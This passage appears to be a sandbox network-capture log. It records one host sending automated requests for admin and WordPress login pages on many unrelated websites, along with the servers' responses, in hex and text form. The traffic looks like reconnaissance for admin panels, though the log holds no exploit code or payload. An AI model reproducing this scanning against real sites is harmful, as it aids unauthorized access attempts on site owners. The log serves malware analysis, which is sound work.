2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 72 73 68 69 70 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6d 67 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 73 61 66 65 73 6d 61 6c 6c 69 63 6f 2e 70 6e 67 22 20 61 6c 74 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 3e 53 61 66 65 20 61 6e 64 20 73 65 63 75 72 65 20 73 68 6f 70 70 69 6e 67 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f Data Ascii: rship</span></div></li><li><div class="img"><img src="https://static.HugeDomains.com/images/hdv3-img/safesmallico.png" alt></div><div class="content"><span>Safe and secure shopping</span></div></li></ul></div></div></div></div><form actio
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 73 73 3d 22 62 74 6e 22 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 33 30 70 78 3b 20 77 69 64 74 68 3a 31 37 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 31 37 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 6c 61 6e 64 65 72 46 75 6e Data Ascii: ss="btn" style="padding-right:30px; width:170px; min-width:170px; margin-top:10px; " id="hdv3Billboard197BuyTabID" onClick="$('#hdv3Billboard197BuyTabID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyTabProceID').removeClass('hiddenAtLoad'); landerFun

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.4	64801	34.206.39.153	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	204	OUT	GET /admin HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc4\|ZYXxI\|ZYXxI User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	535	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Location: https://aldine.org.com/admin/login Cache-Control: no-cache X-Request-Id: cf5c16e4-0400-47cb-8aa3-192e6f38a0f4 X-Runtime: 0.012710
2023-12-22 20:15:02 UTC	111	IN	Data Raw: 36 34 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 64 69 6e 65 2e 6f 72 67 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 6c 6f 67 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 64<html><body>You are being <a href="https://aldine.org.com/admin/login">redirected</a>.</body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.4	64734	185.162.89.66	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	256	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Foceanictrailers.com.au%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: oceanictrailers.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:03 UTC	1304	IN	HTTP/1.1 200 OK Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure x-frame-options: SAMEORIGIN set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/wp-admin; secure set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_sec_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/wp-content/plugins; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/; secure set-cookie: wordpress_logged_in_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/; secure set-cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/; secure
2023-12-22 20:15:03 UTC	1399	IN	Data Raw: 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 63 64 30 61 35 38 30 64 35 61 65 61 66 63 31 31 32 37 66 61 33 38 32 37 35 38 34 61 61 66 63 34 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 73 65 74 Data Ascii: set-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/; secureset-cookie: wordpress_cd0a580d5aeafc1127fa3827584aafc4=%20; expires=Thu, 22-Dec-2022 20:15:03 GMT; Max-Age=0; path=/; secureset
2023-12-22 20:15:03 UTC	5866	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4f 63 65 61 6e 69 63 20 54 72 61 69 6c 65 72 73 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Oceanic Trailers — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.4	64814	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	325	OUT	GET /admin.php HTTP/1.1 Host: loghole.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CyDenFxZIvycSk+5bEMFnGziuWUcw1oiaVstATIkHvEAxpIqgAFiZu+Of9AsRZ7Mh7B5zwHCi7ifKghx/iBmPQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:15:02 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
196	192.168.2.4	64930	104.26.0.173	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	246	OUT	GET /wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache, s-maxage=10 X-Frame-Options: SAMEORIGIN Set-Cookie: PHPSESSID=t3bhc4ud222ni4dqk308a6qgnl; path=/ Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/wp-admin Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_sec_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/wp-content/plugins Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/ Set-Cookie: wordpress_logged_in_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/ Set-Cookie: wp-settings-0=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/
2023-12-22 20:15:02 UTC	1261	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 70 2d 73 65 74 74 69 6e 67 73 2d 74 69 6d 65 2d 30 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 32 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 33 34 65 31 65 66 34 66 64 61 39 3d 25 32 30 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 32 2d 44 65 63 2d 32 30 32 32 20 32 30 3a 31 35 3a 30 32 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 70 61 74 68 3d 2f 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 30 30 36 34 63 39 66 66 62 36 35 34 34 35 66 63 34 66 63 31 32 Data Ascii: Set-Cookie: wp-settings-time-0=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc1234e1ef4fda9=%20; expires=Thu, 22-Dec-2022 20:15:02 GMT; Max-Age=0; path=/Set-Cookie: wordpress_0064c9ffb65445fc4fc12
2023-12-22 20:15:02 UTC	375	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 58 38 46 53 30 65 34 52 78 54 75 34 44 4f 49 4b 72 46 6b 69 42 54 76 32 4d 47 43 62 59 71 6c 55 6c 57 41 6a 75 42 53 30 4c 65 66 71 72 67 56 54 42 45 77 62 66 41 52 45 57 69 34 4e 6f 45 57 42 36 39 68 25 32 46 33 33 42 70 62 58 74 48 25 32 46 44 73 62 71 53 4f 66 72 45 33 61 47 78 52 67 4e 7a 54 68 76 75 41 67 79 34 4f 4c 50 48 50 73 77 25 32 42 6d 36 53 34 4a 56 74 44 4c 6b 6c 4b 49 39 52 38 69 71 47 57 6d 62 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8FS0e4RxTu4DOIKrFkiBTv2MGCbYqlUlWAjuBS0LefqrgVTBEwbfAREWi4NoEWB69h%2F33BpbXtH%2FDsbqSOfrE3aGxRgNzThvuAgy4OLPHPsw%2Bm6S4JVtDLklKI9R8iqGWmb"}],"group":"cf-nel","max_age":604800}
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 31 36 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 166d<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 2e 70 68 70 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 09 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 3e 55 73 65 72 6e 61 6d 65 20 6f 72 20 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 3c 2f 70 3e 0a 0a 09 09 09 3c 64 69 Data Ascii: .php" method="post"><p><label for="user_login">Username or Email Address</label><input type="text" name="log" id="user_login" class="input" value="" size="20" autocapitalize="off" autocomplete="username" required="required"/></p><di
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 6f 72 64 3f 3c 2f 61 3e 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 66 75 6e 63 74 69 6f 6e 20 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 65 72 5f 6c 6f 67 69 6e 22 29 3b 64 2e 66 6f 63 75 73 28 29 3b 64 2e 73 65 6c 65 63 74 28 29 3b 7d 63 61 74 63 68 28 65 72 29 7b 7d 7d 2c 32 30 30 29 3b 7d 77 70 5f 61 74 74 65 6d 70 74 5f 66 6f 63 75 73 28 29 3b 69 66 28 74 79 70 65 6f 66 20 77 70 4f 6e 6c 6f 61 64 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 29 7b 77 70 4f 6e 6c 6f Data Ascii: ord?</a></p><script type="text/javascript">//<![CDATA[function wp_attempt_focus(){setTimeout(function(){try{d=document.getElementById("user_login");d.focus();d.select();}catch(er){}},200);}wp_attempt_focus();if(typeof wpOnload==='function'){wpOnlo
2023-12-22 20:15:02 UTC	1369	IN	Data Raw: 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 76 65 6e 64 6f 72 2f 77 70 2d 70 6f 6c 79 66 69 6c 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 77 70 2d 70 6f 6c 79 66 69 6c 6c 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 68 6f 6f 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 Data Ascii: ducebox.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/hooks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script
2023-12-22 20:15:02 UTC	273	IN	Data Raw: 70 74 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 3d 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 30 64 31 32 37 39 61 39 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f Data Ascii: pt" id="user-profile-js-extra">//<![CDATA[var userProfileL10n={"user_id":"0","nonce":"f40d1279a9"};//...</script><script type="text/javascript" src="https://theproducebox.com/wp-admin/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></
2023-12-22 20:15:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.4	64798	209.124.80.122	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	171	OUT	GET /wp-login.php HTTP/1.1 Host: cicfl.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
198	192.168.2.4	64810	34.149.87.45	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:02 UTC	179	OUT	GET /admin HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	1086	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276102.41817053227839513697 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:15:02 GMT X-Served-By: cache-dfw-kdfw8210106-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalsst5x+YJsbyLN0Et/H9lhFmAX9i+RxyDcNDiBJksR99Y3Ia0t5PWC66or9SAApZ2g==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL,Uh3+FND4gW3xHL7Yw3zy0HOx5fM3NYGU2oh/PYLAjKs=,brHlnRLt/FuujuYg6R3/b/vOHXrUj/LpdoqVq4g5Dks=,WDMzHiyOL7uW518fW2Byr/4LuG63XEniHZO8ZK3qT3KYVyx5DpUh//FRrtiGCQdqtYIDlldA0WB/4YoEaWcTuA== Transfer-Encoding: chunked Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:15:02 UTC	166	IN	Data Raw: 62 37 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 Data Ascii: b71 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sc
